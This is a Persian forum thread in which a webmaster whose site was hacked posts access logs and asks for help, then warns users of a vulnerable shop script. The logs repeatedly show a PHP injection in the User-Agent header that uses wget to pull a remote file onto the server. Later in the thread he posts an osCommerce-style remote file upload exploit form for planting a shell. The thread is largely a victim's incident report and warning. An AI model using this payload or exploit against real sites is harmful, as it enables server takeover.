PDA

View Full Version : هک سایتم



ayub_coder
جمعه 01 بهمن 1389, 15:45 عصر
سلام دوستان.
امروز صبح سیتم هک شد.
زیاد که از هک سر در نمیارم ولی با مطالعه log ها توی سرورم متوجه شدم که یکسری کدهای php به هدرهای http اضافه کرده بودن. نمونه شو میذارم ببینید.
خوب سوال من اینه که چطوری جلوی همچین کاری رو بگیرم که هدرهای دستکاری شده روی سرور اجرا نشن. یه جورایی فیلتر بشن. در کل سایتم هک نشه :لبخند:
اینم لوگهای که از سرور گرفتم.
ببینید آخر همشون کد php اضافه کردن.



184.154.95.116 - - [21/Jan/2011:05:37:21 +0330] "GET /style/style.css HTTP/1.1" 200 564 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:21 +0330] "GET /style/header-style.css HTTP/1.1" 200 296 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:21 +0330] "GET /bodyimages/favicon.ico HTTP/1.1" 200 1150 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:20 +0330] "GET / HTTP/1.1" 200 13221 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:23 +0330] "GET /bodyimages/top-banner.png HTTP/1.1" 200 7081 "http://webexperts.ir/style/header-style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:24 +0330] "GET /bodyimages/favicon.ico HTTP/1.1" 200 1150 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:26 +0330] "GET /menu/stmenu.js HTTP/1.1" 200 8509 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:27 +0330] "GET /bodyimages/mysitebanner.png HTTP/1.1" 200 13228 "http://webexperts.ir/style/header-style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:26 +0330] "GET /dbimages/bom%20chars.png HTTP/1.1" 200 22746 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:26 +0330] "GET /bodyimages/web-experts.png HTTP/1.1" 200 43789 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:28 +0330] "GET /menu/middle.gif HTTP/1.1" 200 162 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:28 +0330] "GET /menu/stcode.js HTTP/1.1" 200 25665 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:31 +0330] "GET /menu/steffie.js HTTP/1.1" 200 1120 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:31 +0330] "GET /menu/steffslip.js HTTP/1.1" 200 1614 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:31 +0330] "GET /menu/steffrect.js HTTP/1.1" 200 1540 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:31 +0330] "GET /menu/blank.gif HTTP/1.1" 200 49 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:32 +0330] "GET /menu/2-left.gif HTTP/1.1" 200 177 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:32 +0330] "GET /menu/zuo-big1.gif HTTP/1.1" 404 389 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:32 +0330] "GET /menu/1arrow_r.gif HTTP/1.1" 404 389 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:32 +0330] "GET /menu/left.gif HTTP/1.1" 200 183 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:32 +0330] "GET /bodyimages/arrow_mini_left.gif HTTP/1.1" 200 81 "http://webexperts.ir/style/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:32 +0330] "GET /bodyimages/ads.png HTTP/1.1" 200 5324 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /menu/you-big1.gif HTTP/1.1" 404 389 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /menu/2-middle.gif HTTP/1.1" 200 161 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /menu/right.gif HTTP/1.1" 200 183 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /bodyimages/links.png HTTP/1.1" 200 5225 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /bodyimages/menutitle.png HTTP/1.1" 200 6326 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /bodyimages/tick.gif HTTP/1.1" 200 82 "http://webexperts.ir/style/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /bodyimages/popular.png HTTP/1.1" 200 7352 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /bodyimages/lastarttitle.png HTTP/1.1" 200 7978 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /bodyimages/arrow_left.gif HTTP/1.1" 200 117 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /bodyimages/content-title.png HTTP/1.1" 200 1571 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:34 +0330] "GET /bodyimages/helpful.png HTTP/1.1" 200 7301 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:34 +0330] "GET /menu/2-right.gif HTTP/1.1" 200 178 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:38:21 +0330] "GET / HTTP/1.1" 200 38 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:38:22 +0330] "GET /favicon.ico HTTP/1.1" 404 389 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:38:22 +0330] "GET /favicon.ico HTTP/1.1" 404 389 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:38:23 +0330] "GET /favicon.ico HTTP/1.1" 404 389 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
217.162.28.98 - - [21/Jan/2011:05:38:44 +0330] "GET / HTTP/1.1" 200 18 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
184.154.95.116 - - [21/Jan/2011:05:39:05 +0330] "GET /favicon.ico HTTP/1.1" 404 389 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:43:00 +0330] "GET /mysite/user.pl HTTP/1.1" 500 99 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:43:20 +0330] "GET /mysite/user.pl HTTP/1.1" 500 99 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
194.72.238.64 - - [21/Jan/2011:06:14:56 +0330] "HEAD / HTTP/1.1" 200 0 "http://www.netcraft.com/survey/

ayub_coder
شنبه 02 بهمن 1389, 00:15 صبح
از اساتید کسی نمیتونه راهنمایی کنه؟:ناراحت:

ayub_coder
یک شنبه 03 بهمن 1389, 11:09 صبح
یعنی کسی تاحالا همچین حالتی براش پیش نیومده؟

alonemm
یک شنبه 03 بهمن 1389, 11:40 صبح
سلام دوست من:
شما در مورد کد نویسی در سایتتون و رعایت مسائل امنیتی (که تاپیکش هم در هدر تالار PHP وجود داره) میتونید تقریبا جلو این عملیات رو بگیرید.
شما در صفحه خاصی از تکس باکس یا از QueryString اطلاعاتی رو میخونید و بدون این که مسال امنیتی رو چک کنید ازش استفاده میکنید؟

ayub_coder
یک شنبه 03 بهمن 1389, 14:28 عصر
همه ورودی ها رو با htlmspecialchars تبدیل می کنم.
آیا امکانش هست که همونطور که بالا هم دیدید. با تغییر هدر های http و جاسازی کد php این کدهای جاسازی شده روی هاست من اجرا بشه.

ayub_coder
چهارشنبه 06 بهمن 1389, 14:58 عصر
دوستان بالاخره یافتم مشکل از کجا بوده
مشکل از اسکریپت فروشگاه e-Virtu بوده که در قسمت فروشگاه سایت گذاشته بودم
اگر از این اسکریپت استفاده می کنید زودتر به patch کردن اون اقدام کنید که به راحتی قابل نفوذه :شیطان:

Hell Lord
چهارشنبه 06 بهمن 1389, 16:43 عصر
دوستان بالاخره یافتم مشکل از کجا بوده
مشکل از اسکریپت فروشگاه e-Virtu بوده که در قسمت فروشگاه سایت گذاشته بودم
اگر از این اسکریپت استفاده می کنید زودتر به patch کردن اون اقدام کنید که به راحتی قابل نفوذه :شیطان:
دلیلش چی بود؟
Injection?

ayub_coder
چهارشنبه 06 بهمن 1389, 18:35 عصر
نه
یک صفحه در بخش مدیریت بدون اینکه وارد بخش مدیریت بشی اجازه آپلود میده:متعجب:
مسیرشم اینه

admin/categories.php/login.php?cPath=&action=new_product_preview

Hell Lord
چهارشنبه 06 بهمن 1389, 19:20 عصر
دمش گرم بابا! :لبخند:
اگر سایت پشتیبانی داره کاش بهشون اعلام میکردید...:بامزه:

ayub_coder
چهارشنبه 06 بهمن 1389, 20:42 عصر
نمیدونم این باگ مال چه وفتی هست
احتمالا تا الان دستش کردن
خیلی ها زا این اسکریپت استفاده میکنند. :گیج:

Program3r
چهارشنبه 06 بهمن 1389, 22:13 عصر
اون اسکریپت رو میتونی بزاری اینجا

تو log سعی کرده با تابع system شل بگیره (با wget)
ببین فایل user.php هنوز همونجاست ؟

ayub_coder
چهارشنبه 06 بهمن 1389, 22:28 عصر
سلام دوست عزیز
این سایت اسکریپت

www.e-virtu.comاینم exploitesh :لبخند:



<html>
<head>
<title>Number 7</title>
</head>
<body>
<div style="text-align: center;"><span
style="color: rgb(102, 102, 102);">(best defacer kairouan
tunisia 2010)</span><br>
</div>
<big style="font-weight: bold; color: rgb(253, 0, 0);"><big>Oscommerce
script: Remote File Upload in /admin/Categories.php</big></big><br>
<?php $host ="site";
$path ="ath";
?>
<form name="new_product"
action="http://<?php echo $host;echo $path; ?>/admin/categories.php/login.php?cPath=&action=new_product_preview"
method="post" enctype="multipart/form-data"><br>
<input name="products_image" type="file"><br>
<input name="submit" value=" Save " type="submit"><br>
<big style="font-weight: bold; color: rgb(253, 0, 0);"><big>shell
here:</big></big><br>
<?php echo ("Using upload File : <a href=http://$host/$path/images/product_info.php>$host/</>$path</>/images/product_info.php</a></font></body>");
?></form>
</body>
</html>


من کلا فروشگاه سازو پاک کردم. خیلی خطری بود. :افسرده:

Program3r
پنج شنبه 07 بهمن 1389, 00:12 صبح
شما سایتتو بده من یه scan بکنم
اکثر باگ ها پیدا میشه
بعدش میتونی از اشیانه کمک بگیری ...

Hell Lord
پنج شنبه 07 بهمن 1389, 00:41 صبح
اقا روش رو بگید ما هم بدونیم!! :گریه:

vimax65
پنج شنبه 07 بهمن 1389, 00:53 صبح
راس میگه
چطوری میشه سایتمونو اسکنش کنیم
باگ هاشو ببندیم؟

ayub_coder
پنج شنبه 07 بهمن 1389, 08:29 صبح
همین سایتی گه تو امضام هست دیگه
webexperts.ir
ولی من اون اسکریپت رو برداشتم
راستی از آشیانه هم سوال پرسیدم. کسی جواب گو نبود. تازه طلب کارم شدن. :متعجب:
از کدوم ابزار استفاده می کنید؟ برای اسکن؟
من چند تا xss چکر استفاده کردم. همه pass شد. :لبخند:

son_games
پنج شنبه 07 بهمن 1389, 10:47 صبح
با استفاده از برنامه ی Acunetix Web Vulnerability Scanner 7 (http://dl.dropbox.com/u/12889492/Acunetix.Web.Vulnerability.Scanner.v7.0%28www.lord hack.com%29%20lordly%20dat%20ir.zip)میتونید سایت تون رو چک کنید.

آموزش و دانلود:

http://www.lordhack.com/article441.html